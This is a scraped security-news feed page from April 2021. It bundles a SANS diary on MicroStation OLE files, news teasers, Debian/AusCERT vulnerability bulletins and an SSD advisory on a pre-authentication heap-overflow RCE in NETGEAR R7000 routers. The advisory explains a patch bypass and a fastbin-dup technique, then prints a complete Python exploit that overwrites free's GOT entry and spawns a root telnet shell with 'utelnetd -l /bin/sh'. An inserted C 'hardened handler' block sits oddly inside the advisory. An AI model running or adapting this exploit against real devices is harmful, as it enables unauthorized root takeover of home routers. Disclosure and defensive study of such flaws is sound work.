Malware Devil

Monday, April 26, 2021

CAD: .DGN and .MVBA Files, (Mon, Apr 26th)

Regularly I receive questions about MicroStation files, since I wrote a diary entry about AutoCAD drawings containing VBA code.

MicroStation is CAD software, and it can run VBA code.

I’ve never been given malicious MicroStation files, but recently I’ve been given a normal drawing (.dgn) and a script file (.mvba).

To be clear: these are not malware samples, the files were given to me so that I could take a look at the internal file format and report it.

Turns out that both files are “OLE files”, and can thus be analyzed with my oledump.py tool.

Here is the .DGN file:

It’s an OLE file with storage (folder) Dgn-Md containing other storages and streams.

And the metadata identifies this as a MicroStation file (I’m using tail to filter out the thumbnail data):

It does not contain VBA code: AFAIK, .DGN files cannot contain VBA code. Please post a comment if I'm wrong, or if you can share a sample .DGN file containing VBA code.

The VBA script file, with extension .MVBA, is also an OLE file with VBA code streams:

Here too, the M indicator alerts us to the presence of VBA code. It can be extracted with oledump:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.




https://malwaredevil.com/2021/04/26/cad-dgn-and-mvba-files-mon-apr-26th/?utm_source=rss&utm_medium=rss&utm_campaign=cad-dgn-and-mvba-files-mon-apr-26th

Cyber Attacks On The Rise For Businesses

A new report, the Hiscox Cyber Readiness Report 2021, surveyed over 6,000 companies in the U.S. and Europe and found that the number of businesses targeted by cyber criminals in the past year increased from 38% to 43%, with over a quarter of those targeted (28%) experiencing five attacks or more, 

The post Cyber Attacks On The Rise For Businesses appeared first on K2io.

The post Cyber Attacks On The Rise For Businesses appeared first on Security Boulevard.




https://malwaredevil.com/2021/04/26/cyber-attacks-on-the-rise-for-businesses/?utm_source=rss&utm_medium=rss&utm_campaign=cyber-attacks-on-the-rise-for-businesses

LinkedIn Attacks Show Dangers of Professional Networking

Leveraging the human factor via social media to launch cyberattacks is a tried-and-true method, and one that will be with us for many more years to come. The recent LinkedIn attacks, where malicious actors used fake profiles linked to hostile states to target employees in key industries and government departments in the United Kingdom, demonstrate..

The post LinkedIn Attacks Show Dangers of Professional Networking appeared first on Security Boulevard.




https://malwaredevil.com/2021/04/26/linkedin-attacks-show-dangers-of-professional-networking/?utm_source=rss&utm_medium=rss&utm_campaign=linkedin-attacks-show-dangers-of-professional-networking

What Will Take Emotet’s Place?

Emotet’s seven-year reign of terror will come to an end Sunday, April 25, 2021 – at least in theory, when law enforcement completes a scheduled mass uninstallation of its infrastructure. A ‘scheduled uninstallation.’ Talk about going out with a whimper – that almost seems like an anticlimactic ending for the malware that security pros like..

The post What Will Take Emotet’s Place? appeared first on Security Boulevard.




https://malwaredevil.com/2021/04/26/what-will-take-emotets-place/?utm_source=rss&utm_medium=rss&utm_campaign=what-will-take-emotets-place

Never Give Your Password Over the Phone

Never give your password to someone over the phone. If someone calls you and asks for your password while saying they are from the Help Desk or Tech Support team, it is most likely an attacker attempting to gain access to your account.



https://malwaredevil.com/2021/04/26/never-give-your-password-over-the-phone/?utm_source=rss&utm_medium=rss&utm_campaign=never-give-your-password-over-the-phone

Instagram Anti-Abuse Tool, Apple Advertiser Restrictions, Terrible Passwords

Instagram is rolling out new features to help block spam and abusive messages, Apple releases iOS 14.5 to restrict tracking by advertisers, and a discussion about why people continue to choose terrible passwords. ** Links mentioned on the show ** Instagram debuts new tool to stop abusive message salvos made through new accounts https://www.zdnet.com/article/instagram-debuts-new-means-to-stop-senders-of-abusive-messages-contacting-you-through-new-accounts/ Apple […]

The post Instagram Anti-Abuse Tool, Apple Advertiser Restrictions, Terrible Passwords appeared first on The Shared Security Show.

The post Instagram Anti-Abuse Tool, Apple Advertiser Restrictions, Terrible Passwords appeared first on Security Boulevard.




https://malwaredevil.com/2021/04/26/instagram-anti-abuse-tool-apple-advertiser-restrictions-terrible-passwords/?utm_source=rss&utm_medium=rss&utm_campaign=instagram-anti-abuse-tool-apple-advertiser-restrictions-terrible-passwords

SSD Advisory – NETGEAR Nighthawk R7000 httpd PreAuth RCE

TL;DR

Find out how a vulnerability in the NETGEAR R7000 allows an attacker to run arbitrary code without authenticating to the device.

Vulnerability Summary

A vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R7000 routers.

Authentication is not required to exploit this vulnerability.

The vulnerability exists within the handling of HTTP requests: the issue results from a lack of proper validation of user-supplied data, which can lead to a heap overflow. An attacker can leverage this vulnerability to execute code with root privileges.

CVE

PENDING

Credit

An independent security researcher has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

Netgear Nighthawk R7000 running firmware version 1.0.11.116 and before

Vendor Response

The vendor has been contacted through Bugcrowd; however, Bugcrowd classified the report as irrelevant because it was not tested on what they stated was the "latest" firmware version, 1.3.2.134, which is incorrect. We attempted to contact them again, but subsequent messages were ignored.

This is the most unprofessional behaviour we have noted from Bugcrowd / the vendor – it is clearly a mistaken classification.

Vulnerability Analysis

We start off by bypassing the patch made for the ZDI-20-709 vulnerability. That patch does not address the root cause of the vulnerability. The httpd program allows a user to upload a file via the URL /backup.cgi.

The root cause of the vulnerability is that the program uses two variables to represent the length of the uploaded file: one is derived from the Content-Length value in the HTTP POST request header, the other is the length of the file content in the HTTP POST request body.

The vulnerability exists in sub_16674. The picture below shows the heap overflow point:

The decompiled code is like this:

The program allocates memory for storing the file content by calling malloc; the return value is stored in dword_1DE2F8, and the requested size is the Content-Length value plus 600. The Content-Length value is attacker-controlled, so by supplying a suitable value we can make malloc return a heap chunk of whatever size we want.

The memcpy function copies the HTTP request payload from s1 to dword_1DE2F8; the copied length is v80-v91, which is the length of the file content in the HTTP POST request body.

So this is the problem: the size of the heap buffer dword_1DE2F8 can be set by the attacker to a small value, while v80-v91 can be set to a larger value. This causes a heap overflow.
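To make the two-length mismatch concrete, here is an added example (not code from the advisory or from the NETGEAR firmware) that models the pattern described above: a buffer sized from the Content-Length header plus 600, beside a hardened handler in which a single validated length governs both the allocation and the copy. It also rejects a request-target containing CR or LF, so a second Content-Length cannot be smuggled in the URL. Function and macro names are hypothetical.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical names; the "+ 600" slack is the one the advisory describes. */
#define HEADER_SLACK 600

/* Size the vulnerable strategy would pass to malloc, or 0 on wraparound. */
size_t vulnerable_alloc_size(size_t header_content_length)
{
    size_t alloc = header_content_length + HEADER_SLACK;
    return alloc < header_content_length ? 0 : alloc;
}

/* Pure arithmetic: would copying body_len bytes into a buffer sized from
 * header_content_length write past its end? Safe to run on any input. */
int would_overflow(size_t header_content_length, size_t body_len)
{
    size_t alloc = vulnerable_alloc_size(header_content_length);
    return alloc == 0 || body_len > alloc;
}

/* Hardened handler: the declared length is capped by policy, must match the
 * body actually received, and is the only value used to size the buffer.
 * Returns 0 and sets *out (caller frees) on success, a negative code otherwise. */
int store_upload_safe(size_t header_content_length, const char *body,
                      size_t body_len, size_t max_upload, char **out)
{
    *out = NULL;
    if (header_content_length > max_upload)
        return -1;                     /* declared length exceeds the cap */
    if (body_len != header_content_length)
        return -2;                     /* header and body disagree: reject */
    char *buf = malloc(body_len + 1);
    if (buf == NULL)
        return -3;
    memcpy(buf, body, body_len);       /* bounded by the same value as malloc */
    buf[body_len] = '\0';
    *out = buf;
    return 0;
}

/* A request-target must not contain CR or LF; otherwise a header such as
 * "Content-Length:" could be embedded in the URL and found by a naive scan. */
int request_target_is_clean(const char *target)
{
    for (const char *p = target; *p != '\0'; p++)
        if (*p == '\r' || *p == '\n')
            return 0;
    return 1;
}
```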

Exploit Considerations

The patch for ZDI-20-709 adds a check of the single byte before Content-Length: it verifies that this byte is a '\n'. So we simply place a '\n' before Content-Length in order to bypass the patch. Though the vulnerabilities are basically the same, the exploit still needs a lot of effort because the heap states differ between the R6700 and the R7000.

We may mount a fastbin dup attack on the heap overflow, but this is not easy. A fastbin dup attack needs two consecutive malloc calls that return two addresses from the same fastbin list: the first malloc returns the chunk whose fd pointer was overwritten by the heap overflow, and the second malloc returns the address where we want to write data.

The biggest problem is that there must be no free between these two malloc calls. But dword_1DE2F8 is checked every time before malloc:

If dword_1DE2F8 is not a null pointer, it is freed and set to 0. Thus we need to find another call site of malloc.

Luckily, there is another malloc whose size we can control, in the function sub_A5B68:

That function handles another file upload HTTP request; we can use /genierestore.cgi to trigger it.

But there is another problem: both the /genierestore.cgi and /backup.cgi requests cause fopen to be called. fopen calls malloc(0x60) and malloc(0x1000), and malloc(0x1000) triggers __malloc_consolidate, which destroys the fastbins, since that size is larger than max_fast.

We need a way to change max_fast to a large value so that __malloc_consolidate is not triggered. According to the implementation of the uClibc free function:

if ((unsigned long)(size) <= (unsigned long)(av->max_fast)
#if TRIM_FASTBINS
    /* If TRIM_FASTBINS set, don't place chunks
       bordering top into fastbins */
    && (chunk_at_offset(p, size) != av->top)
#endif
    ) {
    set_fastchunks(av);
    fb = &(av->fastbins[fastbin_index(size)]); // <--- when size is 8 bytes, fastbin_index(size) is -1
    p->fd = *fb;
    *fb = p;
}

When we free a chunk whose size is 0x8, fastbin_index(size) returns -1, and av->fastbins[fastbin_index(size)] is an out-of-bounds access.

struct malloc_state {
    /* The maximum chunk size to be eligible for fastbin */
    size_t max_fast;                  /* low 2 bits used as flags */   // offset 0
    /* Fastbins */
    mfastbinptr fastbins[NFASTBINS];                                   // offset 4

}

According to the layout of struct malloc_state, fb = &(av->fastbins[-1]) points exactly at max_fast, so *fb = p sets max_fast to a large value. But normally a chunk size cannot be 0x8 bytes, because that would mean 0 bytes of user data.

So we first use the heap overflow to overwrite the PREV_INUSE flag of a chunk so that it incorrectly indicates that the previous chunk is free. Because of the incorrect PREV_INUSE flag, we can get malloc() to return a chunk that overlaps an existing chunk.

This lets us edit the size field in the existing chunk's metadata, setting it to the invalid value 8. When this chunk is freed and placed on the fastbin, malloc_state->max_fast is overwritten with a large value. fopen then no longer leads to __malloc_consolidate, so we can conduct the fastbin dup attack.

Once malloc returns an address of our choosing, we overwrite the GOT entry of free with the address of the system PLT stub. Finally we execute utelnetd -l /bin/sh to start the telnet service, which gives us a root shell on the R7000.

Some techniques were used to make the exploit more reliable:

1. To keep the malloc chunks adjacent, so that the heap overflow does not corrupt other heap-based buffers, I send a very long payload to make the TCP connection close early; the /backup.cgi request then does not go on to call fopen, and there is no other malloc call between the two HTTP requests.

2. The httpd program's heap state may differ depending on whether the user is logged in to or out of the web management interface. To make the heap state consistent, we first try to log on with a wrong password three times; the httpd program then redirects the user to a Router Password Reset page. This leaves the heap state clear and known.

Exploit

# coding: utf-8
from pwn import *
import copy
import sys


def post_request(path, headers, files):
    # Send one multipart/form-data POST with the given file part.
    r = remote(rhost, rport)
    request = 'POST %s HTTP/1.1' % path
    request += '\r\n'
    request += '\r\n'.join(headers)
    request += '\r\nContent-Type: multipart/form-data; boundary=f8ffdd78dbe065014ef28cc53e4808cb\r\n'
    post_data = '--f8ffdd78dbe065014ef28cc53e4808cb\r\nContent-Disposition: form-data; name="%s"; filename="%s"\r\n\r\n' % (files['name'], files['filename'])
    post_data += files['filecontent']
    request += 'Content-Length: %i\r\n\r\n' % len(post_data)
    request += post_data
    r.send(request)
    sleep(0.5)
    r.close()


def gen_request(path, headers, files):
    # Build the same kind of request as post_request, but return it instead of sending it.
    request = 'POST %s HTTP/1.1' % path
    request += '\r\n'
    request += '\r\n'.join(headers)
    request += '\r\nContent-Type: multipart/form-data; boundary=f8ffdd78dbe065014ef28cc53e4808cb\r\n'
    post_data = '--f8ffdd78dbe065014ef28cc53e4808cb\r\nContent-Dasposition: form-data; name="%s"; filename="%s"\r\n\r\n' % (files['name'], files['filename'])
    post_data += files['filecontent']
    request += 'Content-Length: %i\r\n\r\n' % len(post_data)
    request += post_data
    return request


def make_filename(chunk_size):
    # The filename length steers the size of the heap chunk the upload lands in.
    return 'a' * (0x1d7 - chunk_size)


def send_payload(file_name_len, files):
    # /backup.cgi request; the '\n' in the path places a Content-Length where
    # the ZDI-20-709 patch check expects it (see Exploit Considerations).
    total_payload = 'a' * (609 + 1024 * 58)
    path = '/cgi-bin/genie.cgi?backup.cgi\nContent-Length: 4156559'
    headers = ['Host: %s:%s' % (rhost, rport), 'Content-Disposition: form-data', 'a' * 0x200 + ': anynomous']
    f = copy.deepcopy(files)
    f['filename'] = make_filename(file_name_len)
    valid_payload = gen_request(path, headers, f)
    vaild_len = len(valid_payload)
    total_len = 609 + 1024 * 58
    blind_payload_len = total_len - vaild_len
    blind_payload = 'a' * blind_payload_len
    total_payload = blind_payload + valid_payload
    t1 = 0
    t2 = 0
    for i in range(0, 58):
        t1 = int(i * 1024)
        t2 = int((i + 1) * 1024)
        chunk = total_payload[t1:t2]

    last_chunk = total_payload[t2:]
    # print(last_chunk)

    r = remote(rhost, rport)
    r.send(total_payload)
    sleep(0.5)
    r.close()


def execute():
    headers = ['Host: %s:%s' % (rhost, rport), 'a' * 0x200 + ': anynomous']
    # Shape the heap with a few /backup.cgi uploads.
    files = {'name': 'mtenRestoreCfg', 'filecontent': 'a'}
    send_payload(0x18, files)
    files = {'name': 'mtenRestoreCfg', 'filecontent': 'a'}
    send_payload(0x20, files)
    # Overflow into the next chunk's size field / PREV_INUSE flag.
    files = {'name': 'mtenRestoreCfg', 'filecontent': 'a'}
    files['filecontent'] = 'a' * 0x18 + p32(0x3c0) + p32(0x28)
    send_payload(0x18, files)
    # Obtain an overlapping chunk via /genierestore.cgi and set a size field to the invalid value 8.
    f = copy.deepcopy(files)
    f['name'] = 'StringFilepload'
    f['filename'] = 'a' * 0x100
    f['filecontent'] = p32(0x3a0).ljust(0x10) + 'a' * 0x39c + p32(0x9)
    post_request('/genierestore.cgi', headers, f)

    files = {'name': 'mtenRestoreCfg', 'filecontent': 'a'}
    send_payload(0x18, files)
    f = copy.deepcopy(files)
    f['name'] = 'StringFilepload'
    f['filename'] = 'a' * 0x100
    f['filecontent'] = p32(0x20).ljust(0x10) + 'a'
    post_request('/genierestore.cgi', headers, f)
    magic_size = 0x48
    f = copy.deepcopy(files)
    f['name'] = 'StringFilepload'
    f['filename'] = 'a' * 0x100
    f['filecontent'] = p32(magic_size).ljust(0x10) + 'a'
    post_request('/genierestore.cgi', headers, f)

    # Fastbin dup: point a freed chunk's fd near the GOT entry of free.
    free_got_addr = 0x00120920
    files = {'name': 'mtenRestoreCfg', 'filecontent': 'a'}
    files['filecontent'] = 'a' * 0x24 + p32(magic_size + 8 + 1) + p32(free_got_addr - magic_size)
    send_payload(0x20, files)

    files = {'name': 'mtenRestoreCfg', 'filecontent': 'a'}
    send_payload(magic_size, files)
    # Overwrite free's GOT entry with the system PLT stub; the freed buffer holds the command.
    system_addr_plt = 0x0000E804
    command = 'utelnetd -l /bin/sh'
    f = copy.deepcopy(files)
    f['name'] = 'StringFilepload'
    f['filename'] = 'a' * 0x100
    f['filecontent'] = p32(magic_size).ljust(0x10) + command.ljust(magic_size - 8, '\x00') + p32(system_addr_plt)
    post_request('/genierestore.cgi', headers, f)


def send_request():
    # Login attempt used to drive httpd into a known heap state (see "Some techniques" above).
    r = remote(rhost, rport)
    login_request = '''
GET / HTTP/1.1\r
Host: %s\r
Cache-Control: max-age=0\r
Authorization: Basic MToxMjM0NTY3ODEyMzEyMw==\r
Upgrade-Insecure-Requests: 1\r
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r
Accept-Encoding: gzip, deflate\r
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8\r
Cookie: XSRF_TOKEN=1222440606\r
Connection: close\r
\r
''' % rhost
    r.send(login_request)
    a = r.recv(0x1000)
    # print a
    r.close()
    return a


if __name__ == '__main__':
    context.log_level = 'error'
    if (len(sys.argv) < 3):
        print('Usage: %s <rhost> <rport>' % sys.argv[0])
        exit()
    rhost = sys.argv[1]
    rport = sys.argv[2]
    while True:
        ret = send_request()
        firstline = ret.split('\n')[0]
        if firstline.find('200') != -1:
            break
    execute()
    print('router is exploited!!!')



https://malwaredevil.com/2021/04/26/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/?utm_source=rss&utm_medium=rss&utm_campaign=ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce

The Winds of Change – What SolarWinds Teaches Us

In December 2020, the world discovered that the SolarWinds’ Orion Platform had been compromised by cybercriminals, potentially affecting thousands of businesses the world over. Security groups such as the National Cyber Security Centre (NCSC) provided advice and guidance to security teams and IT companies on what actions they should take to minimize the impact on […]

The post The Winds of Change – What SolarWinds Teaches Us appeared first on The State of Security.

The post The Winds of Change – What SolarWinds Teaches Us appeared first on Security Boulevard.




https://malwaredevil.com/2021/04/26/the-winds-of-change-what-solarwinds-teaches-us/?utm_source=rss&utm_medium=rss&utm_campaign=the-winds-of-change-what-solarwinds-teaches-us

ESB-2021.1395 – [Debian] libspring-java: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1395
libspring-java security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: libspring-java
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Execute Arbitrary Code/Commands — Remote/Unauthenticated
Denial of Service — Remote/Unauthenticated
Access Confidential Data — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2018-15756 CVE-2018-11040 CVE-2018-11039
CVE-2018-1270

Reference: ESB-2020.2537
ESB-2020.1400

Original Bulletin:
https://lists.debian.org/debian-lts-announce/2021/04/msg00022.html

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-2635-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/
April 23, 2021 https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------

Package : libspring-java
Version : 4.3.5-1+deb9u1
CVE ID : CVE-2018-1270 CVE-2018-11039 CVE-2018-11040 CVE-2018-15756
Debian Bug : 895114 911786

Multiple vulnerabilities were discovered in libspring-java, a modular
Java/J2EE application framework. An attacker may execute code, perform
XST attack, issue unauthorized cross-domain requests or cause a DoS
(Denial-of-Service) in specific configurations.

CVE-2018-1270

Spring Framework allows applications to expose STOMP over
WebSocket endpoints with a simple, in-memory STOMP broker through
the spring-messaging module. A malicious user (or attacker) can
craft a message to the broker that can lead to a remote code
execution attack.

CVE-2018-11039

Spring Framework allows web applications to change the HTTP
request method to any HTTP method (including TRACE) using the
HiddenHttpMethodFilter in Spring MVC. If an application has a
pre-existing XSS vulnerability, a malicious user (or attacker) can
use this filter to escalate to an XST (Cross Site Tracing) attack.

CVE-2018-11040

Spring Framework allows web applications to enable cross-domain
requests via JSONP (JSON with Padding) through
AbstractJsonpResponseBodyAdvice for REST controllers and
MappingJackson2JsonView for browser requests. Both are not enabled
by default in Spring Framework nor Spring Boot, however, when
MappingJackson2JsonView is configured in an application, JSONP
support is automatically ready to use through the “jsonp” and
“callback” JSONP parameters, enabling cross-domain requests.

CVE-2018-15756

Spring Framework provides support for range requests when serving
static resources through the ResourceHttpRequestHandler, or
starting in 5.0 when an annotated controller returns an
org.springframework.core.io.Resource. A malicious user (or
attacker) can add a range header with a high number of ranges, or
with wide ranges that overlap, or both, for a denial of service
attack.

For Debian 9 stretch, these problems have been fixed in version
4.3.5-1+deb9u1.

We recommend that you upgrade your libspring-java packages.

For the detailed security status of libspring-java please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libspring-java

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================




https://malwaredevil.com/2021/04/26/esb-2021-1395-debian-libspring-java-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1395-debian-libspring-java-multiple-vulnerabilities

ESB-2021.1396 – [UNIX/Linux][Debian] pjproject: Denial of service – Remote with user interaction

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1396
pjproject security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: pjproject
Publisher: Debian
Operating System: Debian GNU/Linux
UNIX variants (UNIX, Linux, OSX)
Impact/Access: Denial of Service — Remote with User Interaction
Resolution: Patch/Upgrade
CVE Names: CVE-2021-21375

Original Bulletin:
https://lists.debian.org/debian-lts-announce/2021/04/msg00023.html

Comment: This advisory references vulnerabilities in products which run on
platforms other than Debian. It is recommended that administrators
running pjproject check for an updated version of the software for
their operating system.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-2636-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Thorsten Alteholz
April 23, 2021 https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------

Package : pjproject
Version : 2.5.5~dfsg-6+deb9u2
CVE ID : CVE-2021-21375

An issue has been found in pjproject, a set of libraries for the PJ
Project. Due to bad handling of two consecutive crafted answers to an
INVITE, an attacker is able to crash the server, resulting in a denial
of service.

For Debian 9 stretch, this problem has been fixed in version
2.5.5~dfsg-6+deb9u2.

We recommend that you upgrade your pjproject packages.

For the detailed security status of pjproject please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/pjproject

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----


ESB-2021.1397 – [Debian] jackson-databind: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1397
jackson-databind security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product:           jackson-databind
Publisher:         Debian
Operating System:  Debian GNU/Linux
Impact/Access:     Modify Arbitrary Files   -- Remote/Unauthenticated
                   Access Confidential Data -- Remote/Unauthenticated
                   Reduced Security         -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2021-20190 CVE-2020-36189 CVE-2020-36188
                   CVE-2020-36187 CVE-2020-36186 CVE-2020-36185
                   CVE-2020-36184 CVE-2020-36183 CVE-2020-36182
                   CVE-2020-36181 CVE-2020-36180 CVE-2020-36179
                   CVE-2020-35728 CVE-2020-35491 CVE-2020-35490
                   CVE-2020-25649 CVE-2020-24750 CVE-2020-24616

Reference:         ASB-2021.0066
                   ASB-2021.0014
                   ESB-2021.0334

Original Bulletin:
   http://www.debian.org/lts/security/2021/dla-2638

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-2638-1                debian-lts@lists.debian.org
https://www.debian.org/lts/security/                          Utkarsh Gupta
April 25, 2021                                https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------

Package : jackson-databind
Version : 2.8.6-1+deb9u9
CVE ID : CVE-2020-24616 CVE-2020-24750 CVE-2020-35490
CVE-2020-35491 CVE-2020-35728 CVE-2020-36179
CVE-2020-36180 CVE-2020-36181 CVE-2020-36182
CVE-2020-36183 CVE-2020-36184 CVE-2020-36185
CVE-2020-36186 CVE-2020-36187 CVE-2020-36188
CVE-2020-36189 CVE-2021-20190

Multiple security vulnerabilities were found in Jackson Databind.

CVE-2020-24616

FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the
interaction between serialization gadgets and typing, related
to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).

CVE-2020-24750

FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the
interaction between serialization gadgets and typing, related
to com.pastdev.httpcomponents.configuration.JndiConfiguration.

CVE-2020-25649

A flaw was found in FasterXML Jackson Databind, where it did not
have entity expansion secured properly. This flaw allows
vulnerability to XML external entity (XXE) attacks. The highest
threat from this vulnerability is data integrity.

CVE-2020-35490

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource.

CVE-2020-35491

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.

CVE-2020-35728

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool
(aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).

CVE-2020-36179

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36180

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36181

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36182

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36183

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool.

CVE-2020-36184

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.

CVE-2020-36185

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource.

CVE-2020-36186

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource.

CVE-2020-36187

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource.

CVE-2020-36188

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
com.newrelic.agent.deps.ch.qos.logback.core.db.JNDICS.

CVE-2020-36189

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
com.newrelic.agent.deps.ch.qos.logback.core.db.DMCS.

CVE-2021-20190

A flaw was found in jackson-databind before 2.9.10.7. FasterXML
mishandles the interaction between serialization gadgets and
typing. The highest threat from this vulnerability is to data
confidentiality and integrity as well as system availability.

